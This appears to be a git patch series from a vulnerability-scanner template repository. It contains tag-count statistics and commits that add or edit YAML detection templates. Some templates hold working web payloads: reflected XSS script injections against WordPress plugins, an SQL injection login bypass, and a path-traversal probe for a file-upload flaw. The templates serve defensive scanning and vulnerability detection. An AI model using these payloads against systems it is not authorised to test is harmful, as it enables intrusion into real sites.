dotnetnuke | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | | monitorix | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | | comodo | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| getsimple | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | | goahead | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| glpi | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | | rujjie | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | | dvr | 1 | | | | | | | | | | synnefo | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | | selea | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | | nette | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| axis | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | | robomongo | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | | clusterengine | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | | postgres | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | | ueditor | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| akkadian | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 63aa45943d..0f79e9d451 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 533 | dhiyaneshdk | 232 | cves | 540 | info | 563 | http | 1624 | -| panel | 213 | pikpikcu | 219 | vulnerabilities | 249 | high | 436 | file | 43 | -| xss | 194 | pdteam | 189 | exposed-panels | 215 | medium | 363 | network | 35 | -| wordpress | 184 | dwisiswant0 | 126 | exposures | 170 | critical | 206 | dns | 11 | -| exposure | 178 | geeknik | 121 | technologies | 151 | low | 150 | | | -| rce | 177 | daffainfo | 108 | misconfiguration | 119 | | | | | -| lfi | 152 | madrobot | 60 | takeovers | 70 | | | | | -| cve2020 | 151 | princechaddha | 53 | default-logins | 49 | | | | | -| wp-plugin | 123 | gy741 | 50 | file | 43 | | | | | -| tech | 93 | gaurang | 42 | workflows | 34 | | | | | +| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | +| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | +| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | +| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | +| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | +| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | +| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | +| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | +| config | 90 | gaurang | 42 | workflows | 34 | | | | | From ebf1653d65cf674afb8baeb3561345b6de1aad47 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 01:33:10 +0530 Subject: [PATCH 1350/4083] Update CVE-2021-36380.yaml --- cves/2021/CVE-2021-36380.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml index 65d5b49a42..f267fd3f68 100644 --- a/cves/2021/CVE-2021-36380.yaml +++ b/cves/2021/CVE-2021-36380.yaml @@ -1,7 +1,7 @@ id: CVE-2021-36380 info: - name: Sunhillo SureLine - Unauthenticated OS Command Injection + name: Sunhillo SureLine - Unauthenticated OS Command Injection description: The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session. author: gy741 severity: critical From a24977aab9ee97f5acbf3a65b3869dd71a22e1ed Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 01:42:01 +0530 Subject: [PATCH 1351/4083] Update CVE-2020-6637.yaml --- cves/2020/CVE-2020-6637.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml index fea9cf3f27..57877fe639 100644 --- a/cves/2020/CVE-2020-6637.yaml +++ b/cves/2020/CVE-2020-6637.yaml @@ -20,7 +20,6 @@ requests: Content-Type: application/x-www-form-urlencoded body: | USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log= - matchers-condition: and matchers: From cda935f2c295cba37707150c1900592b45782ed2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 01:47:58 +0530 Subject: [PATCH 1352/4083] Adding workflow validation --- .github/workflows/templates-stats.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index f7b8dbdeb9..60235df07a 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -9,6 +9,7 @@ on: jobs: build: runs-on: ubuntu-latest + if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master' steps: - name: Checkout Repo uses: actions/checkout@master From b04dc13dcd49b02021334c24d8977a26261c0271 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 2 Aug 2021 02:08:28 +0530 Subject: [PATCH 1353/4083] Update CVE-2021-31581.yaml --- cves/2021/CVE-2021-31581.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-31581.yaml b/cves/2021/CVE-2021-31581.yaml index fac20d465c..4239a6763e 100644 --- a/cves/2021/CVE-2021-31581.yaml +++ b/cves/2021/CVE-2021-31581.yaml @@ -25,6 +25,7 @@ requests: - "name:" - "pass:" condition: and + - type: word words: - "html>" From 54f927329dd3c976aa4443e48e2f03c83d970c05 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 2 Aug 2021 06:09:14 +0700 Subject: [PATCH 1354/4083] Create CVE-2016-1000148.yaml --- cves/2016/CVE-2016-1000148.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2016/CVE-2016-1000148.yaml diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml new file mode 100644 index 0000000000..cd8ee64bee --- /dev/null +++ b/cves/2016/CVE-2016-1000148.yaml @@ -0,0 +1,31 @@ +id: CVE-2016-1000148 + +info: + name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 + tags: cve,cve2016,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - '"><"' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 6347e02b9194cc96111dbb593aaf078d695e0328 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 2 Aug 2021 06:10:17 +0700 Subject: [PATCH 1355/4083] Create CVE-2016-1000149.yaml --- cves/2016/CVE-2016-1000149.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000149.yaml diff --git a/cves/2016/CVE-2016-1000149.yaml b/cves/2016/CVE-2016-1000149.yaml new file mode 100644 index 0000000000..0669b0005b --- /dev/null +++ b/cves/2016/CVE-2016-1000149.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000149 + +info: + name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 27eef8c1a915b2f6acfceb60825df1da24dbfd6c Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 2 Aug 2021 11:07:14 +0900 Subject: [PATCH 1356/4083] Create zhiyuan-file-upload.yaml Zhiyuan OA is a set of office coordinating management software. Recently, Qianxin CERT monitors the relevant vulnerability information of the long OA. Since there is an unauthorized access in some interfaces, and some functions are insufficient, the attacker can upload malicious script files without logging in, so that there is no need to log in. Zhiyuan OA official has provided patches for this vulnerability. In view of the large vulnerability harm, it is recommended that users apply patch updates as soon as possible. Signed-off-by: GwanYeong Kim --- .../other/zhiyuan-file-upload.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/zhiyuan-file-upload.yaml diff --git a/vulnerabilities/other/zhiyuan-file-upload.yaml b/vulnerabilities/other/zhiyuan-file-upload.yaml new file mode 100644 index 0000000000..507967995b --- /dev/null +++ b/vulnerabilities/other/zhiyuan-file-upload.yaml @@ -0,0 +1,28 @@ +id: zhiyuan-file-upload + +info: + name: Zhiyuan Oa arbitrary file upload vulnerability + author: gy741 + severity: critical + reference: https://www.programmersought.com/article/92658169875/ + tags: zhiyuan,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/seeyon/thirdpartyController.do.css/..;/ajax.do" + + matchers-condition: and + matchers: + - type: word + words: + - "java.lang.NullPointerException:null" + + - type: word + words: + - "text/html" + part: header + + 